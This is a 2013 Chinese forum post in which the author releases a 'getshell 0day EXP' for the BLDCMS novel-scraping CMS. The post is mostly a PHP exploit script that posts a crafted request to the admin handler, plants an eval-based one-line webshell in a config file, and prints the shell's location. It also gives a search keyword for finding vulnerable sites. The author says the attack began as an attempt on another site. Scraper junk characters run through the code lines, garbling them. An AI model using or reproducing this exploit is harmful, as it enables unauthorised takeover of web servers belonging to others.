之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
' X. h6 T. {3 y; s( N& F d0 n- B: @; d2 e6 l1 h% d
8 M$ o0 @+ l; r) _6 v
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 - [" B! I, m, k) l, v2 @; g! V
9 a$ N3 D9 H+ y
既然都有人发了 我就把我之前写好的EXP放出来吧, \# j; w# A$ D1 w5 f: z0 A
: H2 p' i5 g! q* P: \' @% mview source print?01.php;">
( k3 {6 c4 N$ X- Q" p ?; {: F. @02.<!--?php
6 A9 ^7 k8 G( n03.echo "-------------------------------------------------------------------
# \ t/ i( O6 t1 D+ e& A* ?04. & @5 f6 g# p) x/ G# L
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP: t7 e; [$ q- f: ^) Y( q, S- v
06. " h, d! T2 N' F) W# C7 m
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
2 B7 o0 l; P) _* @) O5 C08.
2 m! d2 M, Y- s; \09.QQ:981009941\r\n 2013.3.21\r\n 6 w9 H% V# c$ A5 b; Y, H
10. $ }$ x7 H1 D" ^5 S! F
11. ) ~% w9 j& L% A) H- R2 O7 e: D
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
8 `# c8 i8 x) R, x13.
+ N7 ~ ^* u! _/ T( l* G14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------! ]9 Y2 g! a$ }3 c, [
15. 6 W% |0 U2 b$ I0 p u, t
16.--------------------------------------------------------------------\r\n";/ w/ \0 c0 y$ w: l/ |
17.$url=$argv[1];9 f4 r' W( J L/ I q
18.$dir=$argv[2];
0 x: S7 k+ x' V5 c% W19.$pass=$argv[3];
7 c: \! ^* L' T+ Y! n4 R! b/ B20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
2 _% |9 _" c) B) m21.if (emptyempty($pass)||emptyempty($url)) Y4 m. W; c! n3 A" o, b
22.{exit("请输入参数");}9 _/ a" y4 k% B
23.else x; f$ M" ^2 L
24.{
( K; P' F7 K' j# V25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev" @1 Z3 J; e1 s% ~ q
26.
$ Q6 t: r$ a7 d27.al;; R+ c- Q/ U% q5 W
28.$length = strlen($fuckdata);. L* j7 E* }* S# V
29.function getshell($url,$pass)" d6 a+ v) j% M( d8 K
30.{8 |, K/ z+ N& D8 r6 N6 d+ s8 Y# {
31.global $url,$dir,$pass,$eval,$length,$fuckdata;+ p3 B; a4 l; b7 V) t
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";8 s5 I, T C5 L5 ?0 E! ~% w& Y
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";+ ?8 p, b0 Y( [6 u$ P/ R
34.$header .= "User-Agent: MSIE\r\n";
5 m7 h4 P z7 b3 k35.$header .= "Host:".$url."\r\n";% |" i: u) Z3 J. C
36.$header .= "Content-Length: ".$length."\r\n";; p& ^; c/ ^( v" A, A! V
37.$header .= "Connection: Close\r\n";
6 d% }0 i& J# P/ O38.$header .="\r\n";% G. Y, D1 w( C
39.$header .= $fuckdata."\r\n\r\n";* y: p0 C: {5 t0 W+ g8 a
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
; H7 t7 S5 Y) v( s41.if (!$fp)
9 b- j3 M8 s/ O c7 B42.{2 M9 ^, r8 t3 r. z8 e
43.exit ("利用失败:请检查指定目标是否能正常打开");
t2 v1 p8 t0 V4 _3 Q/ C44.}
$ v4 `% v, r/ m! [8 _3 n45.else{ if (!fputs($fp,$header)): e. Y8 C: @* Q7 [
46.{exit ("利用失败");}, T- z1 J4 _; M; D3 B/ _2 S: d5 N, Y% `
47.else
( m1 |" Q8 @' W7 u- \9 w7 h' b# [48.{' r2 c1 q1 [: p2 K1 X! M7 e9 Z
49.$receive = '';
5 K: K7 C4 _( ~: p# P50.while (!feof($fp)) {, Z7 m2 w3 s5 ?
51.$receive .= @fgets($fp, 1000);
l6 M0 J6 a( ~7 J8 B52.}* m, G3 f, I4 S' y7 ?
53.@fclose($fp);: h* E0 n. {3 z v/ ? w1 W$ n' R3 X
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
" e5 }! T$ t! X0 H* `( S, r55.
1 U. s5 z: ?7 V! a: P& O0 H+ J56.GPC是否=off)";. x3 p" B2 X9 s% w% t: o
57.}}
8 W0 F( o+ ?. Z" Y+ X4 D; O0 b58.}
- l. c: ^6 r2 A9 B59.}
4 i5 I J& t; O9 Z' ~, v' M60.getshell($url,$pass);* N& i! H0 S0 |7 ^& y7 I. s
61.?-->
/ s- ] | Y# i- z0 V
5 i: X/ {! m) \
' X& }* F4 v# k " Z2 Y0 k6 o% j
by 数据流
0 d5 t8 S; s; K7 F |
发表于 2013-3-26 20:49:10
收藏
支持
反对